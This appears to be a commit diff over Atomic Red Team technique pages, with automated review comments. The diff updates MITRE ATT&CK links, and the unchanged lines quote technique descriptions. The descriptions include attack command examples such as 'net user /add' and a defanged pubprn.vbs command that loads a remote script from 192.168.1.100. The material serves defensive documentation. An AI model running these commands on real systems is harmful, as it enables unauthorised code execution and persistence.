## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1123)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1123)
<blockquote>An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1124 - System Time Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1124)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1124)
<blockquote>An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)
System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1127.001 - MSBuild
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1127.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1127/001)
<blockquote>Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1132.001 - Standard Encoding
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1132.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1132/001)
<blockquote>Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</blockquote>
## Atomic Tests
+1 -1
View File
@@ -1,5 +1,5 @@
# T1134.004 - Parent PID Spoofing
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1134.004)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1134/004)
<blockquote>Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
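Review bot: only the heading link is updated here, while the unchanged context line still links PowerShell to `https://attack.mitre.org/techniques/T1086` and Rundll32 to `https://attack.mitre.org/techniques/T1085`, the pre-sub-technique IDs that ATT&CK revoked in favour of T1059.001 and T1218.011 respectively. Those links come from the ATT&CK description text rather than from the generator's heading template, so they will keep resolving only through MITRE's redirects; worth tracking as an upstream description update rather than patching in this repository.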
+1 -1
View File
@@ -1,5 +1,5 @@
# T1135 - Network Share Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1135)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1135)
<blockquote>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1136.001 - Local Account
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1136.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1136/001)
<blockquote>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the <code>net user /add</code> command can be used to create a local account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1140 - Deobfuscate/Decode Files or Information
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1140)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1140)
<blockquote>Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
+1 -1
View File
@@ -1,5 +1,5 @@
# T1176 - Browser Extensions
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1176)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1176)
<blockquote>Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials) (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1197 - BITS Jobs
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1197)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1197)
<blockquote>Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin)
+1 -1
View File
@@ -1,5 +1,5 @@
# T1201 - Password Policy Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1201)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1201)
<blockquote>Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code>.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)</blockquote>
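Review bot: the context line contains `<code>chage -l <username></code>`; because these files wrap description text in raw HTML `<code>` tags inside Markdown rather than in backtick code spans, `<username>` is parsed as an unknown HTML element and stripped by sanitizing Markdown renderers such as GitHub's, so the rendered page shows `chage -l ` with the placeholder missing. The generator should HTML-escape `<` and `>` in any description text it emits inside `<code>` (producing `&lt;username&gt;`), or switch to backtick code spans, which escape automatically; the T1114.001 description earlier in this diff avoids the problem only because ATT&CK wrote that path in backticks.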
+1 -1
View File
@@ -1,5 +1,5 @@
# T1202 - Indirect Command Execution
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1202)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1202)
<blockquote>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1204.002 - Malicious File
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1204.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1204/002)
<blockquote>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1207 - Rogue Domain Controller
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1207)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1207)
<blockquote>Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
+1 -1
View File
@@ -1,5 +1,5 @@
# T1216.001 - PubPrn
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1216/001)
<blockquote>Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
<code>PubPrn.vbs</code> is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is <code>cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</code>.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1216 - Signed Script Proxy Execution
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1216)
<blockquote>Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)</blockquote>
## Atomic Tests
+1 -1
View File
@@ -1,5 +1,5 @@
# T1217 - Browser Bookmark Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1217)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1217)
<blockquote>Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1218.001 - Compiled HTML File
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/001)
<blockquote>Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</blockquote>
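Review bot: the unchanged context line reads "bypass application application control" (duplicated word) and "scripting/web related programming languages such VBA" (missing "as"); both are in the ATT&CK description the generator copies verbatim, so they need to be reported upstream rather than edited in the generated file, but they will persist through every regeneration like this one until that happens.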
+1 -1
View File
@@ -1,5 +1,5 @@
# T1218.002 - Control Panel
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/002)
<blockquote>Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)
For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
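Review bot: the page truncates the diff after this file, so the remaining files in this commit are not visible for review. Since the change is a single mechanical substitution in the heading link, the review should be completed with a repository-wide search confirming that no `attack.mitre.org/wiki/Technique/` reference survives after this commit and that every sub-technique file received the `Txxxx/yyy` path form rather than a `Txxxx.yyy` suffix.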

Some files were not shown because too many files have changed in this diff.